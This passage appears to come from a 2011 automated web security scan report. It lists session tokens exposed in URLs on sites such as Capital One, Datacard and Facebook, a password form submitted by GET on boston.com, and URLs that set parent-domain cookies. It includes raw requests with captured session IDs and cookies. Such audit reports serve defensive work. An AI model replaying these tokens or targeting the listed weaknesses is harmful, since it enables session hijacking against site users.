<title id="HTMLTITLE">Capital One Online Banking | Getting Started</ti
...[SNIP]...

8.11. http://www.capitalone.com/redirect.php previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.capitalone.com
Path:	/redirect.php

Issue detail

The URL in the request appears to contain a session token within the query string:

http://www.capitalone.com/redirect.php?Log=1&linkid=WWW_Z_Z_Z_SP29OA_C1_01_G_SP29APP&dest=https://onlinebanking.capitalone.com/CapitalOne/OAO/initiation.aspx?lob=COS&prod=87260IM&prodclass=MMA&itc=CAPITALONE11NZZZDN1QSWZD4&sessionid=FB8DCF93533EFDA4&br=1

Request

GET /redirect.php?Log=1&linkid=WWW_Z_Z_Z_SP29OA_C1_01_G_SP29APP&dest=https://onlinebanking.capitalone.com/CapitalOne/OAO/initiation.aspx?lob=COS&prod=87260IM&prodclass=MMA&itc=CAPITALONE11NZZZDN1QSWZD4&sessionid=FB8DCF93533EFDA4&br=1 HTTP/1.1
Host: www.capitalone.com
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/directbanking/online-savings-accounts/interestplus-online-savings-account/open-account/?linkid=WWW_Z_NDB_A65A9B0C0D704AE0F0G708F_SP1_C4_02_T_SP29OA
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4; caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0400; BIGipServerpl_capitalone.com_443=778642698.65056.0000; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DA; BIGipServerpl_capitalone.com_80=745088266.29215.0000; __utma=106121180.767001896.1311366537.1311366537.1311366537.1; __utmb=106121180.1.10.1311366537; __utmc=106121180; __utmz=106121180.1311366537.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LP_GROUP=49; smartTracking=; decipherinc_seen_popup=set; caponesn=af558df5VY%2FBjsIwDET%2FJXckO1C2dU9oJY574ANauWlEi0pSJbkA5d%2FXLblw8pNnPBpf7HX0rolUkvrjJMyTqhvnnV0MzzKMEVUfSZ3OZ9IAJRxA79IVcKcBEY5QyQEWBVRL2NJ4eo6z8b2Vw4IUAiBsln1RLu3sQ%2BKp%2FVjbp%2FllM9iGCekVCQ%2FZv2YDVKhVzRLy2pK6foxJ1ZH2pKRIpsl3K4keOmf6zDFxsitrUu6Rl3e%2B%2BZDZSY9hZXmtC%2BzM8C2839IYf6p%2F; lpVsGroupTracker=ndb; itc=CAPITALONE11NZZZDN1QSWZD4

Response

HTTP/1.1 302 Found
Date: Fri, 22 Jul 2011 20:33:17 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: itc=CAPITALONE11NZZZDN1QSWZD4; expires=Tue, 20-Sep-2011 20:33:17 GMT; path=/; domain=.capitalone.com
Location: https://onlinebanking.capitalone.com/CapitalOne/OAO/initiation.aspx?lob=COS&prod=87260IM&prodclass=MMA&itc=CAPITALONE11NZZZDN1QSWZD4&sessionid=FB8DCF93533EFDA4&br=1
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 1
Content-Type: text/html; charset=ISO-8859-1

8.12. http://www.datacard.com/combined.js previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.datacard.com
Path:	/combined.js

Issue detail

The URL in the request appears to contain a session token within the query string:

http://www.datacard.com/combined.js;jsessionid=FEBD781C8E9F0320A0CDFE03A28F4DE0

Request

GET /combined.js;jsessionid=FEBD781C8E9F0320A0CDFE03A28F4DE0 HTTP/1.1
Host: www.datacard.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.datacard.com/
Cookie: JSESSIONID=FEBD781C8E9F0320A0CDFE03A28F4DE0; ATG_SESSION_ID=FEBD781C8E9F0320A0CDFE03A28F4DE0

Response

HTTP/1.1 200 OK
Content-Type: text/javascript;charset=US-ASCII
Server: Microsoft-IIS/7.5
X-ATG-Version: UNKNOWN [ DPSLicense/-1 ]
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Date: Thu, 21 Jul 2011 16:03:21 GMT
Connection: close
Content-Length: 119776

/*
* jQuery validation plug-in 1.5
*
* http://bassistance.de/jquery-plugins/jquery-plugin-validation/
* http://docs.jquery.com/Plugins/Validation
*
* Copyright (c) 2006 - 2008 J..rn Zaefferer

...[SNIP]...

8.13. http://www.datacard.com/id/js/libs/hoverIntent-min.js previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.datacard.com
Path:	/id/js/libs/hoverIntent-min.js

Issue detail

The URL in the request appears to contain a session token within the query string:

http://www.datacard.com/id/js/libs/hoverIntent-min.js;jsessionid=FEBD781C8E9F0320A0CDFE03A28F4DE0

Request

GET /id/js/libs/hoverIntent-min.js;jsessionid=FEBD781C8E9F0320A0CDFE03A28F4DE0 HTTP/1.1
Host: www.datacard.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.datacard.com/
Cookie: JSESSIONID=FEBD781C8E9F0320A0CDFE03A28F4DE0; ATG_SESSION_ID=FEBD781C8E9F0320A0CDFE03A28F4DE0

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: application/x-javascript
Last-Modified: Fri, 15 Jul 2011 20:40:15 GMT
Accept-Ranges: bytes
ETag: "80e18d662f43cc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Date: Thu, 21 Jul 2011 16:03:22 GMT
Content-Length: 1287

(function($){$.fn.hoverIntent=function(f,g){var cfg={sensitivity:7,interval:100,timeout:0};cfg=$.extend(cfg,g?{over:f,out:g}:f);var cX,cY,pX,pY;var track=function(ev){cX=ev.pageX;cY=ev.pageY;};var com
...[SNIP]...

8.14. http://www.datacard.com/id/js/libs/jquery-1.2.6.pack.js previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.datacard.com
Path:	/id/js/libs/jquery-1.2.6.pack.js

Issue detail

The URL in the request appears to contain a session token within the query string:

http://www.datacard.com/id/js/libs/jquery-1.2.6.pack.js;jsessionid=FEBD781C8E9F0320A0CDFE03A28F4DE0

Request

GET /id/js/libs/jquery-1.2.6.pack.js;jsessionid=FEBD781C8E9F0320A0CDFE03A28F4DE0 HTTP/1.1
Host: www.datacard.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.datacard.com/
Cookie: JSESSIONID=FEBD781C8E9F0320A0CDFE03A28F4DE0; ATG_SESSION_ID=FEBD781C8E9F0320A0CDFE03A28F4DE0

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: application/x-javascript
Last-Modified: Thu, 28 Aug 2008 21:42:10 GMT
Accept-Ranges: bytes
ETag: "0a5b6ec569c91:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Date: Thu, 21 Jul 2011 16:03:23 GMT
Content-Length: 31033

/*
* jQuery 1.2.6 - New Wave Javascript
*
* Copyright (c) 2008 John Resig (jquery.com)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* $Date: 2008-05-2
...[SNIP]...

8.15. http://www.datacard.com/id/js/libs/thickbox-compressed.js previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.datacard.com
Path:	/id/js/libs/thickbox-compressed.js

Issue detail

The URL in the request appears to contain a session token within the query string:

http://www.datacard.com/id/js/libs/thickbox-compressed.js;jsessionid=FEBD781C8E9F0320A0CDFE03A28F4DE0

Request

GET /id/js/libs/thickbox-compressed.js;jsessionid=FEBD781C8E9F0320A0CDFE03A28F4DE0 HTTP/1.1
Host: www.datacard.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.datacard.com/
Cookie: JSESSIONID=FEBD781C8E9F0320A0CDFE03A28F4DE0; ATG_SESSION_ID=FEBD781C8E9F0320A0CDFE03A28F4DE0

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: application/x-javascript
Last-Modified: Wed, 08 Sep 2010 20:06:47 GMT
Accept-Ranges: bytes
ETag: "80e5a25d914fcb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Date: Thu, 21 Jul 2011 16:03:23 GMT
Content-Length: 5987

/*
* Thickbox 3 - One Box To Rule Them All.
* By Cody Lindley (http://www.codylindley.com)
* Copyright (c) 2007 cody lindley
* Licensed under the MIT License: http://www.opensource.org/licenses/mi
...[SNIP]...

8.16. http://www.datacard.com/id/js/search/highlight-min.js previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.datacard.com
Path:	/id/js/search/highlight-min.js

Issue detail

The URL in the request appears to contain a session token within the query string:

http://www.datacard.com/id/js/search/highlight-min.js;jsessionid=FEBD781C8E9F0320A0CDFE03A28F4DE0

Request

GET /id/js/search/highlight-min.js;jsessionid=FEBD781C8E9F0320A0CDFE03A28F4DE0 HTTP/1.1
Host: www.datacard.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.datacard.com/
Cookie: JSESSIONID=FEBD781C8E9F0320A0CDFE03A28F4DE0; ATG_SESSION_ID=FEBD781C8E9F0320A0CDFE03A28F4DE0

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: application/x-javascript
Last-Modified: Thu, 21 Jul 2011 14:45:13 GMT
Accept-Ranges: bytes
ETag: "8022dccb447cc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Date: Thu, 21 Jul 2011 16:03:22 GMT
Content-Length: 3805

var JumpToFirstOccurance=false;var CatchJSErrors=true;var SkipZoomStops=true;var IsZoomStop=0;function catcherror(){return true;}if(CatchJSErrors){window.onerror=catcherror;}function QueryString(key){
...[SNIP]...

8.17. http://www.datacard.com/id/swfobject/swfobject.js previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.datacard.com
Path:	/id/swfobject/swfobject.js

Issue detail

The URL in the request appears to contain a session token within the query string:

http://www.datacard.com/id/swfobject/swfobject.js;jsessionid=FEBD781C8E9F0320A0CDFE03A28F4DE0

Request

GET /id/swfobject/swfobject.js;jsessionid=FEBD781C8E9F0320A0CDFE03A28F4DE0 HTTP/1.1
Host: www.datacard.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.datacard.com/
Cookie: JSESSIONID=FEBD781C8E9F0320A0CDFE03A28F4DE0; ATG_SESSION_ID=FEBD781C8E9F0320A0CDFE03A28F4DE0

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Thu, 11 Jun 2009 20:14:00 GMT
Accept-Ranges: bytes
ETag: "0f42e28d1eac91:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Date: Thu, 21 Jul 2011 16:03:22 GMT
Content-Length: 10220

/* SWFObject v2.2 <http://code.google.com/p/swfobject/>
is released under the MIT License <http://www.opensource.org/licenses/mit-license.php>
*/
var swfobject=function(){var D="undefined",r="objec
...[SNIP]...

8.18. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

http://www.facebook.com/extern/login_status.php?api_key=109674171476&app_id=109674171476&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfc8692de067554%26origin%3Dhttp%253A%252F%252Fwww.myyearbook.com%252Ff2e4895dade670e%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df11e5a6998ae2d6%26origin%3Dhttp%253A%252F%252Fwww.myyearbook.com%252Ff2e4895dade670e%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfa590c146bc99e%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3ddad7626c023c%26origin%3Dhttp%253A%252F%252Fwww.myyearbook.com%252Ff2e4895dade670e%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfa590c146bc99e&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df112580d4a22926%26origin%3Dhttp%253A%252F%252Fwww.myyearbook.com%252Ff2e4895dade670e%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfa590c146bc99e&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df349cd81f322cfa%26origin%3Dhttp%253A%252F%252Fwww.myyearbook.com%252Ff2e4895dade670e%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfa590c146bc99e&sdk=joey&session_origin=1&session_version=3

Request

GET /extern/login_status.php?api_key=109674171476&app_id=109674171476&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfc8692de067554%26origin%3Dhttp%253A%252F%252Fwww.myyearbook.com%252Ff2e4895dade670e%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df11e5a6998ae2d6%26origin%3Dhttp%253A%252F%252Fwww.myyearbook.com%252Ff2e4895dade670e%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfa590c146bc99e%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3ddad7626c023c%26origin%3Dhttp%253A%252F%252Fwww.myyearbook.com%252Ff2e4895dade670e%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfa590c146bc99e&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df112580d4a22926%26origin%3Dhttp%253A%252F%252Fwww.myyearbook.com%252Ff2e4895dade670e%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfa590c146bc99e&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df349cd81f322cfa%26origin%3Dhttp%253A%252F%252Fwww.myyearbook.com%252Ff2e4895dade670e%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfa590c146bc99e&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/
Cookie: locale=en_US; datr=IykoTi-5gj--5ol5RZyR1cQ2

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.76.37
X-Cnection: close
Date: Thu, 21 Jul 2011 17:59:15 GMT
Content-Length: 268

<script type="text/javascript">
parent.postMessage("cb=f112580d4a22926&origin=http\u00253A\u00252F\u00252Fwww.myyearbook.com\u00252Ff2e4895dade670e&relation=parent&transport=postmessage&frame=fa590c14
...[SNIP]...

8.19. http://www.google.com/recaptcha/api/challenge previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.google.com
Path:	/recaptcha/api/challenge

Issue detail

The URL in the request appears to contain a session token within the query string:

http://www.google.com/recaptcha/api/challenge?k=6LdTvgsAAAAAALsgavl1LD-lUyj0_kIVQEhoZu21&ajax=1&authp=ajax_verify_2.nonce.type.style.lang&ajax_verify_2=1&nonce=16847450574544093266&type=image&style=standard&lang=en&psig=Rx6HMPMQogOs4Q8VmwoihBnxfOc

Request

GET /recaptcha/api/challenge?k=6LdTvgsAAAAAALsgavl1LD-lUyj0_kIVQEhoZu21&ajax=1&authp=ajax_verify_2.nonce.type.style.lang&ajax_verify_2=1&nonce=16847450574544093266&type=image&style=standard&lang=en&psig=Rx6HMPMQogOs4Q8VmwoihBnxfOc HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://home.live.com/search/hip?query=h02332
Cookie: PREF=ID=5f095d1913dfb266:U=94b487df0bd866af:FF=0:TM=1311179451:LM=1311259550:S=OkO5G-xMVZh3wrlr; NID=49=Mc75k8GaC4sODRf5gDiSshg7ZVBiCfL_peK--7yvryZzGeVuBMVM4SaPcjtGgf68flt1aAl6V7nItJhqlhvA7fFgIz41ztbNbR_3j6OjdY1RUGqfLgMHQ7CDj7_I7grK

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Date: Sat, 23 Jul 2011 04:41:11 GMT
Content-Type: text/javascript
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 492
Server: GSE

var RecaptchaState = {
site : '6LdTvgsAAAAAALsgavl1LD-lUyj0_kIVQEhoZu21',
challenge : '03AHJ_Vuu9D09tsmTao-PMP8NZyjQAewHxhRNI1y4I9cWES_JGNkDa1TdakaO_uvuvY7--QCpGV4wxUwMze1NIeTr43sGF52ML9qmkcr
...[SNIP]...

8.20. http://www.pages05.net/WTS/event.jpeg previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.pages05.net
Path:	/WTS/event.jpeg

Issue detail

The URL in the request appears to contain a session token within the query string:

http://www.pages05.net/WTS/event.jpeg?accesskey=1a8b3ca-1267bb7dbd6-c6f842ded9e6d11c5ffebd715e129037&v=1.07&isNewSession=1&type=pageview&isNewVisitor=1&sessionGUID=ee5a66d9-978c-c68b-e147-14e7a459a9b3&webSyncID=6c69e4de-49da-ebb2-7d34-26442827e243&url=http%3A%2F%2Fwww.silverpop.com%2Fdemo%2Findex.html&newSiteVisit=1&referringURL=http%3A%2F%2Fwww.silverpop.com%2Fmarketing-resources%2Findex.html&hostname=www.silverpop.com&pathname=%2Fdemo%2Findex.html&pagename=%2Fdemo%2Findex.html&newPageVisit=1&requestGuid=88a5865b-bce0-ac33-85b6-087d98ccd692

Request

GET /WTS/event.jpeg?accesskey=1a8b3ca-1267bb7dbd6-c6f842ded9e6d11c5ffebd715e129037&v=1.07&isNewSession=1&type=pageview&isNewVisitor=1&sessionGUID=ee5a66d9-978c-c68b-e147-14e7a459a9b3&webSyncID=6c69e4de-49da-ebb2-7d34-26442827e243&url=http%3A%2F%2Fwww.silverpop.com%2Fdemo%2Findex.html&newSiteVisit=1&referringURL=http%3A%2F%2Fwww.silverpop.com%2Fmarketing-resources%2Findex.html&hostname=www.silverpop.com&pathname=%2Fdemo%2Findex.html&pagename=%2Fdemo%2Findex.html&newPageVisit=1&requestGuid=88a5865b-bce0-ac33-85b6-087d98ccd692 HTTP/1.1
Host: www.pages05.net
Proxy-Connection: keep-alive
Referer: http://www.silverpop.com/demo/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 19:55:45 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, s-maxage=0
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 70
Connection: close
Content-Type: image/png

.PNG
.
...IHDR....................IDATx.c``...........}....IEND.B`.

9. Password field submitted using GET method previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.boston.com
Path:	/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links

The form contains the following password field:

pass

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passwords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.

Request

Response

10. Cookie scoped to parent domain previous next
There are 189 instances of this issue:

http://c.microsoft.com/trans_pixel.aspx
http://clients.mobilecause.com/lists/1227/subscriptions/web.js
http://games.myyearbook.com/
http://games.myyearbook.com/landing/pool
http://hipservice.live.com/gethip.srf
http://home.myyearbook.com/Countries
http://home.myyearbook.com/feed/giftFeedItems
http://home.myyearbook.com/feed/myMagFeedItems
http://home.myyearbook.com/feed/tvFeedItems
http://pixel.everesttech.net/2368/gr
http://pixel1350.everesttech.net/1350/p
http://t.mookie1.com/t/v1/imp
http://wow.curse.com/user/NetworkCookie/ajaxSession.aspx
http://a.collective-media.net/adj/cm.yearbook/ford_ron_071911
http://a.netmng.com/hic/
http://a.tribalfusion.com/j.ad
http://a1.interclick.com/ColDta.aspx
http://ad.turn.com/server/ads.js
http://ad.turn.com/server/pixel.htm
http://ads.adap.tv/beacons
http://ads.adap.tv/cookie
http://ads.pointroll.com/PortalServe/
http://adx.adnxs.com/mapuid
http://ak1.abmr.net/is/a.collective-media.net
http://ak1.abmr.net/is/showadsak.pubmatic.com
http://amch.questionmarket.com/adsc/d922005/24/42823090/decide.php
http://amch.questionmarket.com/adsc/d922005/24/42823584/decide.php
http://amch.questionmarket.com/adsc/d922005/24/42823586/decide.php
http://amch.questionmarket.com/adsc/d922005/24/42825515/decide.php
http://amch.questionmarket.com/adsc/d922005/24/42825637/decide.php
http://ap.lijit.com/www/delivery/retarget.php
http://api.bizographics.com/v1/profile.json
http://api.bizographics.com/v1/profile.redirect
http://apr.lijit.com///www/delivery/ajs.php
http://ar.voicefive.com/bmx3/broker.pli
http://at.amgdgt.com/ads/
http://b.scorecardresearch.com/b
http://b.scorecardresearch.com/p
http://b.scorecardresearch.com/r
http://b.voicefive.com/b
http://bcp.crwdcntrl.net/4/c=520%7Crand=110304385%7Cpv=y%7Crt=ifr
http://bh.contextweb.com/bh/getuid
http://bs.serving-sys.com/BurstingPipe/adServer.bs
http://c.atdmt.com/c.gif
http://c.bing.com/c.gif
http://c.live.com/c.gif
http://ce.lijit.com/merge
http://cf.addthis.com/red/p.json
http://clk.atdmt.com/goiframe/222276744/331989646/direct
http://clk.atdmt.com/goiframe/223672189/334126009/direct
http://cms.quantserve.com/dpixel
http://code.msdn.microsoft.com/
http://code.msdn.microsoft.com/globalresources/scripts/ms2.js
http://code.msdn.microsoft.com/site/upload
http://community.spiceworks.com/r/595
http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer
http://cspix.media6degrees.com/orbserv/hbpix
http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/4146544210108361256/mchpid/3/url/
http://gam.adnxs.com/gtj
http://home.live.com/search
http://home.live.com/search/
http://home.live.com/search/hip
http://i.w55c.net/ping_match.gif
http://ib.adnxs.com/ab
http://ib.adnxs.com/getuid
http://ib.adnxs.com/getuidnb
http://ib.adnxs.com/if
http://ib.adnxs.com/mapuid
http://ib.adnxs.com/ptj
http://ib.adnxs.com/ptj
http://ib.adnxs.com/ptj
http://ib.adnxs.com/seg
http://id.google.com/verify/EAAAADlr6isilNNYzGAaxKhrZpM.gif
http://id.google.com/verify/EAAAAEwMF-hbQc293ckILMv5etg.gif
http://id.google.com/verify/EAAAAFtbipzwLyDvaVuyeCeXNM4.gif
http://id.google.com/verify/EAAAAOJV-bC0aOnp7SAOnBJZllE.gif
http://id.google.com/verify/EAAAAO_wEIygyxFXLeRT2ha2P9w.gif
http://idcs.interclick.com/Segment.aspx
http://image2.pubmatic.com/AdServer/Pug
http://image2.pubmatic.com/AdServer/Pug
http://image2.pubmatic.com/AdServer/Pug
http://images.apple.com/global/metrics/js/s_code_h.js
http://images.apple.com/global/nav/scripts/globalnav.js
http://images.apple.com/global/nav/styles/navigation.css
http://images.apple.com/global/scripts/apple_core.js
http://images.apple.com/global/scripts/browserdetect.js
http://images.apple.com/global/scripts/content_swap.js
http://images.apple.com/global/scripts/lib/event_mixins.js
http://images.apple.com/global/scripts/lib/prototype.js
http://images.apple.com/global/scripts/lib/scriptaculous.js
http://images.apple.com/global/scripts/overlay_panel.js
http://images.apple.com/global/scripts/promomanager.js
http://images.apple.com/global/scripts/search_decorator.js
http://images.apple.com/global/scripts/swap_view.js
http://images.apple.com/global/scripts/view_master_tracker.js
http://images.apple.com/global/styles/base.css
http://images.apple.com/macpro/scripts/pagenav.js
http://images.apple.com/macpro/scripts/performance.js
http://images.apple.com/metrics/scripts/s_code_h.js
http://images.apple.com/support/css/base_new.css
http://images.apple.com/support/css/global/nav/navigation.css
http://images.apple.com/support/css/suggest2.css
http://images.apple.com/support/css/support.css
http://images.apple.com/support/home/css/home2011.css
http://images.apple.com/support/iknow/scripts/ACQuicklinks2.js
http://images.apple.com/support/iknow/scripts/ACShortcuts.js
http://images.apple.com/support/scripts/AppleCareWeb/Modules/ExpressLane.js
http://images.apple.com/support/scripts/SCReporting.js
http://images.apple.com/support/scripts/module_decorator.js
http://images.apple.com/support/scripts/new_country.js
http://images.apple.com/support/scripts/new_support_coverage/cookies.js
http://images.apple.com/support/scripts/new_support_coverage/en_strings.js
http://images.apple.com/support/scripts/new_support_coverage/functions.js
http://images.apple.com/support/scripts/psp_geos.js
http://images.apple.com/support/scripts/support.global.js
http://images.apple.com/support/scripts/warranty_check/warrantykeys.js
http://images.apple.com/support/scripts/warranty_check/warrantypsp.js
http://js.revsci.net/gateway/gw.js
http://leadback.advertising.com/adcedge/lb
http://lifescript.us.intellitxt.com/intellitxt/front.asp
http://lm.trafficmp.com/clicksense/epic
http://load.exelator.com/load/
http://m.adnxs.com/msftcookiehandler
http://media.fastclick.net/w/get.media
http://media.trafficmp.com/a/js
http://media.trafficmp.com/a/js
http://msdn.microsoft.com/magazine/ee336135.aspx
http://mssto.112.2o7.net/b/ss/msstoerrors/1/H.20.2--NS/0
http://odb.outbrain.com/utils/get
http://p.brilig.com/contact/bct
http://pix04.revsci.net/A11149/a4/0/0/123.302
http://pix04.revsci.net/D08734/a1/0/3/0.js
http://pix04.revsci.net/G07608/a4/0/0/pcx.js
